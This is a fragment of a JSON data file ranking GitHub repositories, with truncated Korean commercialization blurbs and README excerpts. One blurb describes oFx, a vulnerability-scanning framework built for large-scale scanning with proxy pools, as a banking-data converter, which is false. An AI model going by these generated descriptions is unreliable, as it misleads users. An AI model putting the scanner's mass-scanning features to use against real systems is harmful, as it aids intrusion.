MyGet](https://img.shields.io/myget/dapper/vpre/Dapper.svg)](https:","composite_score":0.1471,"license_safety_tag":"unknown"},{"name":"FaridSafi/react-native-gifted-chat","github_url":"https://github.com/FaridSafi/react-native-gifted-chat","stars":5,"language":"TypeScript","license":"mit","abandonment_months":0,"description":"# react-native-gifted-chat 분석\n\n## 왜 보물인가\n모바일 앱에서 카카오톡처럼 메시지를 주고받는 화면을 쉽게 만들 수 있는 준비된 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS - 팀 협업 앱**: Slack 같은 기업용 메신저 서비스에서 채팅 화면 구현\n2. **내부 업무 도구**: 고객 상담 센터의 상담사-고객 간 실시간","readme_excerpt":"<p align=\"center\">\n  <a href=\"https://www.npmjs.com/package/react-native-gifted-chat\"><img alt=\"npm version\" src=\"https://badge.fury.io/js/react-native-gifted-chat.svg\"/></a>\n  <a href=\"https://www.npmjs.com/package/react-native-gifted-chat\"><img alt=\"npm downloads\" src=\"https://img.shields.io/npm/dm/react-native-gifted-chat.svg\"/></a>\n  <a href=\"https://circleci.com/gh/FaridSafi/react-native-gifted-chat\"><img src=\"https://circleci.com/gh/FaridSafi/react-native-gifted-chat.svg?style=shield\" alt=\"build\"></a>\n  <img src=\"https://img.shields.io/badge/platforms-iOS%20%7C%20Android%20%7C%20Web-lightgrey.svg\" alt=\"platforms\">\n  <img src=\"https://img.shields.io/badge/TypeScript-supported-blue.svg\" alt=\"TypeScript\">\n  <img src=\"https://img.shields.io/badge/Expo-compatible-000020.svg\" alt=\"Expo compatible\">\n</p>\n\n<h1 align=\"center\">React Native Gifted Chat</h1>\n\n<p align=\"center\">\n  The most complete chat UI for React Native & Web\n</p>\n\n<p align=\"center\">\n  <a href=\"https://snack.expo.dev/@kesh","composite_score":0.147,"license_safety_tag":"safe"},{"name":"coalton-lang/coalton","github_url":"https://github.com/coalton-lang/coalton","stars":10,"language":"Common Lisp","license":"MIT","abandonment_months":0,"description":"# Coalton 저장소 분석\n\n## 왜 보물인가\n프로그래밍 언어를 만드는 기술로, 특정 분야의 복잡한 계산을 더 안정적이고 빠르게 처리할 수 있는 새로운 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **금융 거래 플랫폼**: 복잡한 수학 계산이 필요한 자동 매매 시스템을 더 안정적으로 운영\n2. **과학 데이터 분석 서비스**: 대규모 통계 계산을 정확하","readme_excerpt":"<p align=\"center\">\n  <a href=\"https://coalton-lang.github.io/\">\n    <img alt=\"Coalton\" src=\"docs/assets/coalton-logotype-gray.svg\" style=\"zoom:45%;\" />\n  </a>\n</p>\n\n<p align=\"center\" class=\"badges\">\n  <a href=\"https://github.com/coalton-lang/coalton/actions/workflows/main.yml\">\n    <img alt=\"Github Workflow Status\" src=\"https://img.shields.io/github/actions/workflow/status/coalton-lang/coalton/main.yml?branch=main\" />\n  </a>\n  <a href=\"https://discord.gg/cPb6Bc4xAH\">\n    <img alt=\"Discord\" src=\"https://img.shields.io/discord/888196168067199046?logo=discord\" />\n  </a>\n</p>\n\nCoalton is an efficient, statically typed functional programming language that supercharges Common Lisp.\n\nCoalton integrates directly into Common Lisp:\n\n```lisp\n(defpackage #:differentiation\n  (:use #:coalton #:coalton-prelude)\n  (:local-nicknames (#:sym #:coalton/symbol))\n  (:export #:Expr #:EConst #:EVar #:E+ #:E*)\n  (:export #:diff #:t #:d/dt))\n\n(in-package #:differentiation)\n\n(named-readtables:in-readtable coalto","composite_score":0.147,"license_safety_tag":"safe"},{"name":"php-fig/fig-standards","github_url":"https://github.com/php-fig/fig-standards","stars":5,"language":"","license":"NOASSERTION","abandonment_months":3,"description":"# PHP-FIG/FIG-Standards 분석\n\n## 왜 보물인가\n전 세계 PHP 개발자들이 따르는 '코딩 표준 설계도'로, 누구나 같은 방식으로 프로그램을 만들 수 있게 도와주는 국제 가이드라인입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: PHP 코딩 자동 검사 도구를 만들어 기업 개발팀에 월 구독으로 판매\n2. **내부 업무 도구*","readme_excerpt":"PHP Framework Interoperability Group\n====================================\n\nThe idea behind the group is for project representatives to talk about the\ncommonalities between our projects and find ways we can work together. Our main\naudience is each other, but we’re very aware that the rest of the PHP community\nis watching. If other folks want to adopt what we’re doing they are welcome to\ndo so, but that is not the aim.\n\nProposing a Standard Recommendation\n------------------------------------\n\nTo propose a PHP Standard Recommendation (PSR):\n\n- fork this repo, create a branch, checkout that branch, add the PSR in\n  `proposed/`, push the branch to GitHub, and send a pull request; or,\n\n- create a ticket to start a discussion on GitHub; or,\n\n- start a conversation on the [mailing list][].\n\n[mailing list]: http://groups.google.com/group/php-fig/\n\nGitHub usage\n------------\n\nAll discussion regarding a PSR happens on the [mailing list][]. Issues filed\nin GitHub are rarely monitored, and PRs are l","composite_score":0.1469,"license_safety_tag":"unknown"},{"name":"transmission-remote-gui/transgui","github_url":"https://github.com/transmission-remote-gui/transgui","stars":5,"language":"Pascal","license":"GPL-2.0","abandonment_months":3,"description":"# Transmission Remote GUI 상업화 분석\n\n## 왜 보물인가\n인터넷 파일 공유 프로그램을 원격으로 간편하게 관리할 수 있는 도구로, 기술자들이 복잡한 설정 없이 파일 전송을 제어하고 싶어 하는 니즈를 해결합니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 클라우드 관리 서비스**: 기업의 대용량 파일 백업·배포를 웹 대시보드에서 한눈에","readme_excerpt":"# Transmission Remote GUI\n\n[![Build Status](https://app.travis-ci.com/transmission-remote-gui/transgui.svg?branch=master)](https://app.travis-ci.com/transmission-remote-gui/transgui)\n\n![Screenshot](http://i.imgur.com/XBbF4Vh.png)\n\n<!-- START doctoc generated TOC please keep comment here to allow auto update -->\n<!-- DON'T EDIT THIS SECTION, INSTEAD RE-RUN doctoc TO UPDATE -->\n## Table of Contents\n\n- [Introduction](#introduction)\n- [Installation](#installation)\n  - [Linux](#linux)\n    - [Easy way (recommended)](#easy-way-recommended)\n    - [Harder way](#harder-way)\n  - [Windows](#windows)\n    - [Portable zip tarball (recommended)](#portable-zip-tarball-recommended)\n    - [Installer](#installer)\n    - [Using Chocolatey](#using-chocolatey)\n  - [macOS](#macos)\n    - [Without a package manager](#without-a-package-manager)\n    - [Homebrew](#homebrew)\n- [Command line parameters](#command-line-parameters)\n- [Portable mode](#portable-mode)\n- [Fixed hotkeys](#fixed-hotkeys)\n- [Advanced parameter","composite_score":0.1466,"license_safety_tag":"restricted"},{"name":"bigblackhat/oFx","github_url":"https://github.com/bigblackhat/oFx","stars":6,"language":"Python","license":"GPL-3.0","abandonment_months":7,"description":"# oFx 저장소 분석\n\n## 왜 보물인가\n금융 데이터를 표준화된 형식으로 변환하는 도구로, 은행·회계 소프트웨어 간 데이터 호환성을 자동으로 처리합니다.\n\n## 어디에 쓸 수 있나\n1. **회계 소프트웨어 SaaS**: 중소 기업이 여러 은행 계좌의 거래 내역을 한 곳에서 자동 관리하는 서비스\n2. **세무사/회계사 업무 도구**: 고객사로부터 받은 다양","readme_excerpt":"![ofx](https://socialify.git.ci/bigblackhat/ofx/image?description=1&font=Rokkitt&forks=1&issues=1&logo=https%3A%2F%2Fimg.icons8.com%2F%3Fsize%3D100%26id%3DF83fTNEFxxFm%26format%3Dpng%26color%3D000000&name=1&pattern=Floating%20Cogs&pulls=1&stargazers=1&theme=Light)\n\noFx是一个开源的、开箱即用的漏洞批量验证框架。无需任何编程基础，只需一条命令即可快速验证、扫描漏洞\n\n## 🐈 项目优势\n\n### 架构设计优势\n1. 模块化设计：采用清晰的模块分离，核心组件低耦合高内聚 \n2. 调度中心模式：通过 oFxCenter 统一管理扫描流程和资源调度 \n3. 模板方法模式：POC 基类定义标准化接口，便于扩展和维护，详见: [POC编写规范及要求说明](https://github.com/bigblackhat/oFx/blob/main/docs/CODING.md)\n\n### 核心技术创新\n1. 智能代理池：自动筛选国内代理，动态测试和失效剔除机制 \n2. 蜜罐检测：内置多种蜜罐特征库，基于HTTP响应内容分析，大幅降低误报率 \n3. 全量POC扫描：接近专业漏洞扫描器功能，支持290+预置POC脚本，参见: [POC支持清单](https://github.com/bigblackhat/oFx/blob/main/docs/POCList.md)\n4. Fofa API深度集成：支持多模式资产获取，智能去重和地域筛选\n\n### 性能与扩展性\n1. 高并发处理：支持自定义线程数，队列化管理避免资源浪费 \n2. 标准化POC接口：统一的POC开发规范，便于社区贡献 \n3. 多格式输出：支持TXT、Markdown、CSV、HTML等多种输出格式\n\n### 用户体验优化\n1. 简洁易用：命令行界面直观，参数设计合理 \n2. 完善日志系统：分级日志管理，详细的漏洞发现记录 \n3. 声音提醒：扫描完成时的声音提示功能 \n4. 企业级特性：代理池支持避免IP封禁，适合大规模扫描\n\n### 安全专业性\n1. 高精度检","composite_score":0.1464,"license_safety_tag":"restricted"},{"name":"dschep/ntfy","github_url":"https://github.com/dschep/ntfy","stars":6,"language":"Python","license":"gpl-3.0","abandonment_months":7,"description":"# ntfy 저장소 분석\n\n## 왜 보물인가\n복잡한 기술 없이 누구나 간단하게 알림 메시지를 보낼 수 있는 시스템으로, 스마트폰과 컴퓨터에서 중요한 소식을 즉시 받아볼 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 알림 전달 플랫폼**\n스타트업이나 중소기업들이 자신의 앱/웹서비스에 내장하여 사용자에게 실시간 알림을 보내는 기능을 제공","readme_excerpt":"# About `ntfy`\n\n[![Version](https://img.shields.io/pypi/v/ntfy.svg?logo=data%3Aimage/svg%2Bxml%3Bbase64%2CPHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIyNDAiIGhlaWdodD0iMjQwIj48cGF0aCBmaWxsPSIjMzY3MWEyIiBkPSJNNjIuNDc2IDMzLjRjMC0xNi4zNiA0LjM4Ni0yNS4yNiAyOC42MDctMjkuNDk4IDE2LjQ0NC0yLjg4IDM3LjUyOC0zLjI0MiA1Ny4xOTMgMCAxNS41MzMgMi41NjQgMjguNjA3IDE0LjEzNCAyOC42MDcgMjkuNDk3djUzLjk3YzAgMTUuODMtMTIuNjkzIDI4Ljc5NS0yOC42MDcgMjguNzk1SDkxLjA4M2MtMTkuNDEgMC0zNS43NyAxNi41NS0zNS43NyAzNS4yNnYyNS44OTVIMzUuNjVjLTE2LjYzNiAwLTI2LjMyLTExLjk5My0zMC4zODgtMjguNzc2LTUuNDktMjIuNTQ2LTUuMjU2LTM1Ljk4IDAtNTcuNTc0QzkuODE4IDcyLjEzNyAyNC4zNzUgNjIuMTk4IDQxLjAxIDYyLjE5OGg3OC42OHYtNy4yMDRINjIuNDc2VjMzLjR6Ii8%2BPHBhdGggZmlsbD0iI2ZmZDA0NiIgZD0iTTE3Ni44ODMgMjA2LjEyM2MwIDE2LjM2LTE0LjE5OCAyNC42NDQtMjguNjA3IDI4Ljc3Ni0yMS42NzggNi4yMy0zOS4wNzUgNS4yNzMtNTcuMTkzIDAtMTUuMTMtNC40MS0yOC42MDctMTMuNDE3LTI4LjYwNy0yOC43OHYtNTMuOTdjMC0xNS41MzMgMTIuOTQ3LTI4Ljc5OCAyOC42MDctMjguNzk4aDU3LjE5M2MxOS4wNSAwIDM1Ljc3LTE2LjQ2NSAzNS43","composite_score":0.1464,"license_safety_tag":"restricted"},{"name":"liudf0716/xkcptun","github_url":"https://github.com/liudf0716/xkcptun","stars":11,"language":"C","license":"gpl-3.0","abandonment_months":12,"description":"# xkcptun 저장소 분석\n\n## 왜 보물인가\n인터넷 속도를 개선하고 네트워크 연결을 안정화시키는 기술로, 느린 인터넷 환경에서도 빠른 속도를 경험할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **게임/영상 스트리밍 서비스**: 저화질 지역 사용자도 고화질 콘텐츠를 끊김 없이 볼 수 있는 SaaS 플랫폼\n2. **기업 원격근무 솔루션**: 네트","readme_excerpt":"![xkcptun](https://github.com/liudf0716/xkcptun/blob/master/logo-big.png)\n\n[![Build Status][1]][2] \n[![Powered][3]][4]\n[![license][5]][6]\n[![PRs Welcome][7]][8]\n[![Issue Welcome][9]][10]\n[![OpenWRT][11]][12]\n[![KunTeng][13]][14]\n\n[1]: https://img.shields.io/travis/liudf0716/xkcptun.svg?style=plastic\n[2]: https://travis-ci.org/liudf0716/xkcptun\n[3]: https://img.shields.io/badge/KCP-Powered-blue.svg?style=plastic\n[4]: https://github.com/skywind3000/kcp\n[5]: https://img.shields.io/badge/license-GPLV3-brightgreen.svg?style=plastic\n[6]: https://github.com/KunTengRom/xfrp/blob/master/LICENSE\n[7]: https://img.shields.io/badge/PRs-welcome-brightgreen.svg?style=plastic\n[8]: https://github.com/liudf0716/xkcptun/pulls\n[9]: https://img.shields.io/badge/Issues-welcome-brightgreen.svg?style=plastic\n[10]: https://github.com/liudf0716/xkcptung/issues/new\n[11]: https://img.shields.io/badge/Platform-%20OpenWRT%20%7CLEDE%20%7CCentOS%20-brightgreen.svg?style=plastic\n[12]: https://github.com/gigibox/openwr","composite_score":0.1459,"license_safety_tag":"restricted"},{"name":"uds-se/debuggingbook","github_url":"https://github.com/uds-se/debuggingbook","stars":14,"language":"Python","license":"NOASSERTION","abandonment_months":7,"description":"# debuggingbook 저장소 분석\n\n## 왜 보물인가\n소프트웨어의 버그를 찾고 고치는 방법을 체계적으로 가르치는 교육 자료로, 프로그래머들의 생산성을 크게 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **개발자 교육 플랫폼 SaaS**: 신입 개발자나 코딩 입문자를 위한 온라인 강좌 서비스로 월 구독료 수취\n2. **기업 내부 QA 도구","readme_excerpt":"<!-- Debuggingbook README -->\n\n<!-- Badges to be shown on project page -->\n\n[![Code Tests](https://github.com/uds-se/debuggingbook/actions/workflows/check-code.yml/badge.svg)](https://github.com/uds-se/debuggingbook/actions/workflows/check-code.yml)\n&nbsp;\n[![Notebook Tests](https://github.com/uds-se/debuggingbook/actions/workflows/check-notebooks.yml/badge.svg)](https://github.com/uds-se/debuggingbook/actions/workflows/check-notebooks.yml)\n&nbsp;\n[![Static Type Checking](https://github.com/uds-se/debuggingbook/actions/workflows/check-types.yml/badge.svg)](https://github.com/uds-se/debuggingbook/actions/workflows/check-types.yml)\n&nbsp;\n[![Imports](https://github.com/uds-se/debuggingbook/actions/workflows/check-imports.yml/badge.svg)](https://github.com/uds-se/debuggingbook/actions/workflows/check-imports.yml)\n&nbsp;\n[![Website www.debuggingbook.org](https://img.shields.io/website-up-down-green-red/https/www.debuggingbook.org.svg)](https://www.debuggingbook.org/)\n\n[![Launch Binder](htt","composite_score":0.1456,"license_safety_tag":"unknown"},{"name":"zeit/hyper","github_url":"https://github.com/zeit/hyper","stars":7,"language":"TypeScript","license":"mit","abandonment_months":0,"description":"# zeit/hyper 프로젝트 분석\n\n## 왜 보물인가\n터미널(검은색 화면)을 더 예쁘고 사용하기 편하게 만드는 도구로, 개발자뿐 아니라 기술을 배우는 모든 사람이 필요로 합니다.\n\n## 어디에 쓸 수 있나\n1. **개발자 도구 SaaS**: 프로그래머들이 구독료를 내고 사용하는 클라우드 기반 터미널 서비스로 운영\n2. **기업 내부 도구**: IT팀이 ","readme_excerpt":"![](https://assets.vercel.com/image/upload/v1549723846/repositories/hyper/hyper-3-repo-banner.png)\n\n<p align=\"center\">\n  <a aria-label=\"Vercel logo\" href=\"https://vercel.com\">\n    <img src=\"https://img.shields.io/badge/MADE%20BY%20Vercel-000000.svg?style=for-the-badge&logo=vercel&labelColor=000000&logoWidth=20\">\n  </a>\n </p>\n  \n[![Node CI](https://github.com/vercel/hyper/workflows/Node%20CI/badge.svg?event=push)](https://github.com/vercel/hyper/actions?query=workflow%3A%22Node+CI%22+branch%3Acanary+event%3Apush)\n[![Changelog #213](https://img.shields.io/badge/changelog-%23213-lightgrey.svg)](https://changelog.com/213)\n\nFor more details, head to: https://hyper.is\n\n## Project goals\n\nThe goal of the project is to create a beautiful and extensible experience for command-line interface users, built on open web standards. In the beginning, our focus will be primarily around speed, stability and the development of the correct API for extension authors.\n\nIn the future, we anticipate the commun","composite_score":0.1454,"license_safety_tag":"safe"},{"name":"rust-embedded/cross","github_url":"https://github.com/rust-embedded/cross","stars":6,"language":"Rust","license":"Apache-2.0","abandonment_months":1,"description":"# rust-embedded/cross 분석 보고서\n\n## 왜 보물인가\n다양한 컴퓨터 환경에서 소프트웨어를 쉽게 만들 수 있도록 돕는 개발자 도구로, 복잡한 설정 없이 크로스 플랫폼 개발을 간편하게 만들어줍니다.\n\n## 어디에 쓸 수 있나\n\n1. **임베디드 기기 개발 SaaS**: IoT 기기·산업용 센서 개발자를 위한 클라우드 기반 개발 환경 구독 서비","readme_excerpt":"[![crates.io](https://img.shields.io/crates/v/cross.svg)](https://crates.io/crates/cross)\n[![crates.io](https://img.shields.io/crates/d/cross.svg)](https://crates.io/crates/cross)\n[![CI](https://github.com/cross-rs/cross/actions/workflows/ci.yml/badge.svg?query=branch%3Amain)](https://github.com/cross-rs/cross/actions/workflows/ci.yml?query=branch)\n[![Matrix](https://img.shields.io/matrix/cross-rs:matrix.org)](https://matrix.to/#/#cross-rs:matrix.org)\n\n# `cross`\n\n> “Zero setup” cross compilation and “cross testing” of Rust crates\n\nThis project is developed and maintained by the [cross-rs] team.\nIt was previously maintained by the Rust Embedded Working Group Tools team.\nNew contributors are welcome! Please join our [Matrix room] and say hi.\n\n<p align=\"center\">\n<img\n  alt=\"`cross test`ing a crate for the aarch64-unknown-linux-gnu target\"\n  src=\"assets/cross-test.png\"\n  title=\"`cross test`ing a crate for the aarch64-unknown-linux-gnu target\"\n>\n<br>\n<em>`cross test`ing a crate for the aarc","composite_score":0.1454,"license_safety_tag":"safe"},{"name":"Autoware-AI/autoware.ai","github_url":"https://github.com/Autoware-AI/autoware.ai","stars":7,"language":"Dockerfile","license":"Apache-2.0","abandonment_months":0,"description":"# Autoware.ai 상용화 분석\n\n## 왜 보물인가\n자동차가 스스로 주행하는 기술을 만드는 오픈소스 프로젝트로, 전 세계 자동차 회사들이 자신의 자동주행차 개발에 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **자동주행차 개발 SaaS**: 자동차 회사에 클라우드 기반 시뮬레이션·테스트 서비스 제공\n- **배달로봇·셔틀 제어 API**: 식음료","readme_excerpt":"# Autoware - the world's leading open-source software project for autonomous driving\n\n![Autoware_RViz](https://user-images.githubusercontent.com/63835446/158918717-58d6deaf-93fb-47f9-891d-e242b02cba7b.png)\n\n<!--- Contributors -->\n<p align=\"center\">\n    <a href=\"https://github.com/autowarefoundation/autoware_universe/graphs/contributors\">\n        <img src=\"https://img.shields.io/github/contributors/autowarefoundation/autoware_universe?style=flat&label=Autoware%20Universe%20Contributors\"\n            alt=\"Autoware Universe Contributors\" /></a>\n    <a href=\"https://github.com/autowarefoundation/autoware/graphs/contributors\">\n        <img src=\"https://img.shields.io/github/contributors/autowarefoundation/autoware?style=flat&label=Autoware%20Contributors\"\n            alt=\"Autoware Contributors\" /></a>\n</p>\n\n<!--- Commit Activity -->\n<p align=\"center\">\n    <a href=\"https://github.com/autowarefoundation/autoware_universe/pulse\">\n        <img src=\"https://img.shields.io/github/commit-activity/m","composite_score":0.1453,"license_safety_tag":"safe"},{"name":"philipperemy/keras-tcn","github_url":"https://github.com/philipperemy/keras-tcn","stars":5,"language":"Python","license":"MIT","abandonment_months":3,"description":"# Keras-TCN 저장소 분석\n\n## 왜 보물인가\n시계열 데이터(주식, 날씨, 센서 값 등 시간에 따라 변하는 데이터)를 정확하게 예측하는 무료 오픈소스 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS**: 주식 시장 가격 예측 서비스나 에너지 소비량 예측 플랫폼으로 구독료 모델로 운영\n2. **내부 업무 도구**: 제조업체의 기계 장비 고장 ","readme_excerpt":"# Keras TCN\n\n*Keras Temporal Convolutional Network*. [[paper](https://arxiv.org/abs/1803.01271)]\n\nTested with Tensorflow 2.9, 2.10, 2.11, 2.12, 2.13, 2.14, 2.15, 2.16, 2.17, 2.18, 2.19 (Mar 13, 2025).\n\nFor a fully working example of Keras TCN using **R Language**, [browse here](https://github.com/philipperemy/keras-tcn/issues/246).\n\n[![Downloads](https://pepy.tech/badge/keras-tcn)](https://pepy.tech/project/keras-tcn)\n[![Downloads](https://pepy.tech/badge/keras-tcn/month)](https://pepy.tech/project/keras-tcn)\n![Keras TCN CI](https://github.com/philipperemy/keras-tcn/workflows/Keras%20TCN%20CI/badge.svg?branch=master)\n```bash\npip install keras-tcn\n```\n\nFor [MacOS users](https://developer.apple.com/metal/tensorflow-plugin/) to use the GPU: `pip install tensorflow-metal`.\n\n## Why TCN (Temporal Convolutional Network) instead of LSTM/GRU?\n\n- TCNs exhibit longer memory than recurrent architectures with the same capacity.\n- Performs better than LSTM/GRU on long time series (Seq. MNIST, Adding","composite_score":0.1452,"license_safety_tag":"safe"},{"name":"pqpo/SmartCropper","github_url":"https://github.com/pqpo/SmartCropper","stars":20,"language":"Java","license":"unknown","abandonment_months":9,"description":"# SmartCropper 사업화 분석\n\n## 왜 보물인가\n사진이나 이미지에서 필요한 부분만 똑똑하게 자르는 기술로, 전자상거래·부동산·소셜미디어 등 이미지를 다루는 모든 비즈니스에 필수적입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**: 온라인 쇼핑몰 운영자들이 상품 사진을 자동으로 정리하는 웹 서비스\n**2. 내부 업무 도구**: 부동산","readme_excerpt":"# SmartCropper\n\n## [English](README_EN.md) | 中文\n\n***目前优化了一套更高识别率的模型和算法，有意向合作的请联系邮箱：pqponet@gmail.com***\n\n简单易用的智能图片裁剪库，适用于身份证，名片，文档等照片的裁剪。 如果觉得还不错，欢迎 star，fork。\n\n你也可以关注我的另一个库 [SmartCamera](https://github.com/pqpo/SmartCamera)： SmartCamera 是一个 Android 相机拓展库，能够实时采集并且识别相机内物体边框是否吻合指定区域。\n\n## 支持特性\n\n- 使用智能算法(基于opencv)识别图片中的边框  \n- 支持拖动锚点，手动调节选区，放大镜效果提升定位体验\n- 使用透视变换裁剪并矫正选区，还原正面图片\n- 支持丰富的UI设置，如辅助线，蒙版，锚点，放大镜等\n\n## 例子（[传送门](art/SmartCropperSampleV6.apk)）\n\n### 1. 选择图片后智能选区，使用透视变换裁剪并矫正选区：\n\n![](art/smart_crop_1.png)\n![](art/cropped_1.png)\n\n### 2. 拖动锚点，手动调节选区，右上角放大镜效果方便拖拽定位：\n\n![](art/advance_crop_2.png)\n\n### gif 动画：\n\n![](art/smartcropper_photo.gif)\n![](art/smartcropper_album_1.gif)\n\n## 优化智能选区算法(V2.1.1+)\n使用机器学习算法代理 Canny 算法，提高识别率(基于 TensorFlow 的 HED 网络).\n感谢：https://github.com/fengjian0106/hed-tutorial-for-document-scanning\n\n1. build.gradle 添加如下代码，不压缩模型：\n```gradle\naaptOptions {\n    noCompress \"tflite\"\n    noCompress \"lite\"\n}\n```\n2. 在合适的地方初始化(比如在 Application.onCreate)：\n```java\nSmartCropper.buildImageDetect","composite_score":0.1446,"license_safety_tag":"unknown"},{"name":"wbenny/pdbex","github_url":"https://github.com/wbenny/pdbex","stars":6,"language":"C++","license":"mit","abandonment_months":11,"description":"# pdbex 상용화 분석 보고서\n\n## 왜 보물인가\n복잡한 프로그램 파일을 분석하고 문제를 찾아내는 작업을 자동화해주는 개발자 전문 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **소프트웨어 개발사의 SaaS 서비스**: 클라우드 기반 코드 분석 플랫폼으로 제공하여 개발팀이 버그를 빠르게 찾도록 지원\n2. **기업의 내부 업무 도구**: IT 팀이 자사 ","readme_excerpt":"[![Build status](https://ci.appveyor.com/api/projects/status/8e24lcfhp1ltngfu?svg=true)](https://ci.appveyor.com/project/wbenny/pdbex)\n\n# pdbex\n\npdbex is a utility for reconstructing structures and unions from the [PDB files][msdn-symbols] into compilable C headers.\n\n### Why?\n\nPDB files, among others, contain information about structures and unions.\nThese information can be very useful - for instance structures and unions from **ntdll.dll** or **ntoskrnl.exe** can be useful for experimenting with Windows internals.\nBut information in the PDB files are limited only to the symbol name, member name, its type and offset.\nInformation about nested anonymous structures and unions are lost.\nHowever, with a bit of work, they can be formed back.\n\nI am not aware of any utility which could make a compilable and offset-accurate C header representation of symbols in the PDB file.\nAlthough there do exist [some][headers-mirt] [public][headers-nirsoft] [servers][headers-moonsoft] which list some of the","composite_score":0.1441,"license_safety_tag":"safe"},{"name":"RainwayApp/bebop","github_url":"https://github.com/RainwayApp/bebop","stars":8,"language":"C#","license":"Apache-2.0","abandonment_months":3,"description":"# RainwayApp/bebop 분석 보고서\n\n## 왜 보물인가\n실시간 통신이 필요한 애플리케이션을 빠르고 효율적으로 만들 수 있는 개발 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **협업 도구 SaaS**: 팀 프로젝트 관리, 실시간 채팅, 공동 문서 편집 플랫폼의 핵심 기술로 활용\n2. **게임 및 멀티플레이 서비스**: 온라인 게임이나 실시간 대","readme_excerpt":"<a href=\"https://bebop.sh/\" target=\"_blank\" rel=\"noopener\">\n  <picture>\n    <source media=\"(prefers-color-scheme: dark)\" srcset=\"./assets/header.jpg\" />\n    <img alt=\"Bebop\" src=\"./assets/header.jpg\" />\n  </picture>\n</a>\n\n<div align=\"center\">\n  <h1>Bebop</h1>\n  <h3>No ceremony, just code.<br/> Blazing fast, typesafe binary serialization.</h3>\n\n  <a href=\"https://github.com/6over3/bebop/blob/main/LICENSE.txt\">\n    <img alt=\"Apache License\" src=\"https://img.shields.io/github/license/6over3/bebop\" />\n  </a>\n  <a href=\"https://discord.gg/jVfz9sMPWv\">\n    <img alt=\"Discord\" src=\"https://img.shields.io/discord/1102669305537110036?color=7389D8&label&logo=discord&logoColor=ffffff\" />\n  </a>\n  <br />\n  <a href=\"https://twitter.com/andrewmd5\">\n    <img alt=\"Twitter\" src=\"https://img.shields.io/twitter/url.svg?label=%40andrewmd5&style=social&url=https%3A%2F%2Ftwitter.com%2Fandrewmd5\" />\n  </a>\n</div>\n\n<br />\n\n## Introduction\n\n\nBebop is a high-performance data interchange format designed for fast ","composite_score":0.1439,"license_safety_tag":"safe"},{"name":"zeit/now-cli","github_url":"https://github.com/zeit/now-cli","stars":8,"language":"TypeScript","license":"apache-2.0","abandonment_months":0,"description":"# zeit/now-cli 분석 보고서\n\n## 왜 보물인가\n웹사이트나 애플리케이션을 클라우드에 쉽게 배포할 수 있는 도구로, 개발자들의 번거로운 서버 관리 작업을 자동화합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹 애플리케이션 배포 플랫폼으로 월 구독료를 받고 자동 배포 기능 제공\n2. **내부 업무 도구**: 대기업의 개발팀이 자체","readme_excerpt":"<p align=\"center\">\n  <a href=\"https://vercel.com\">\n    <img src=\"https://assets.vercel.com/image/upload/v1588805858/repositories/vercel/logo.png\" height=\"96\">\n    <h3 align=\"center\">Vercel</h3>\n  </a>\n</p>\n\n<p align=\"center\">\n  Develop. Preview. Ship.\n</p>\n\n<p align=\"center\">\n  <a href=\"https://vercel.com/docs\"><strong>Documentation</strong></a> ·\n  <a href=\"https://vercel.com/changelog\"><strong>Changelog</strong></a> ·\n  <a href=\"https://vercel.com/templates\"><strong>Templates</strong></a> ·\n  <a href=\"https://vercel.com/docs/cli\"><strong>CLI</strong></a>\n</p>\n<br/>\n\n## Vercel\n\nVercel’s AI Cloud is a unified platform for building modern applications, giving teams the tools to be flexible, move fast, and stay secure while focusing on their products instead of infrastructure.\n\n## Deploy\n\nGet started by [importing a project](https://vercel.com/new), [choosing a template](https://vercel.com/templates), or using the [Vercel CLI](https://vercel.com/docs/cli). Then, `git push` to deploy.\n\n##","composite_score":0.1438,"license_safety_tag":"safe"},{"name":"fossasia/knitlib","github_url":"https://github.com/fossasia/knitlib","stars":11,"language":"Python","license":"LGPL-3.0","abandonment_months":4,"description":"# fossasia/knitlib 분석 보고서\n\n## 왜 보물인가\n뜨개질 기계를 컴퓨터로 제어할 수 있게 해주는 오픈소스 도구로, 수작업 의류 제조 산업을 자동화할 수 있는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **온디맨드 의류 제조 플랫폼**: 고객이 온라인에서 디자인을 선택하면 뜨개질 기계가 자동으로 맞춤형 옷을 만드는 서비스\n2. **패션","readme_excerpt":"\n===============================\nknitlib\n===============================\n\n.. | |docs| |travis| |appveyor| |coveralls| |landscape| |scrutinizer|\n.. | |version| |downloads| |wheel| |supported-versions| |supported-implementations|\n\n| |travis| |docs| |downloads| |scrutinizer|\n\n..  |docs| image:: https://readthedocs.org/projects/knitlib/badge/?style=flat\n    :target: https://readthedocs.org/projects/knitlib\n    :alt: Documentation Status\n\n..  |travis| image:: http://img.shields.io/travis/fashiontec/knitlib/master.png?style=flat\n    :alt: Travis-CI Build Status\n    :target: https://travis-ci.org/fashiontec/knitlib\n\n..  |appveyor| image:: https://ci.appveyor.com/api/projects/status/github/tian2992/knitlib?branch=master\n    :alt: AppVeyor Build Status\n    :target: https://ci.appveyor.com/project/tian2992/knitlib\n\n..  |coveralls| image:: http://img.shields.io/coveralls/tian2992/knitlib/master.png?style=flat\n    :alt: Coverage Status\n    :target: https://coveralls.io/r/tian2992/knitlib\n\n..  |lan","composite_score":0.1438,"license_safety_tag":"restricted"},{"name":"matomo-org/device-detector","github_url":"https://github.com/matomo-org/device-detector","stars":5,"language":"PHP","license":"LGPL-3.0","abandonment_months":2,"description":"# Device Detector 저장소 분석\n\n## 왜 보물인가\n스마트폰, 태블릿, 컴퓨터 등 사용자가 어떤 기기에서 접속했는지 자동으로 인식하는 기술로, 온라인 비즈니스에서 고객 이해에 필수적입니다.\n\n## 어디에 쓸 수 있나\n1. **웹사이트 분석 SaaS**: 방문자가 어떤 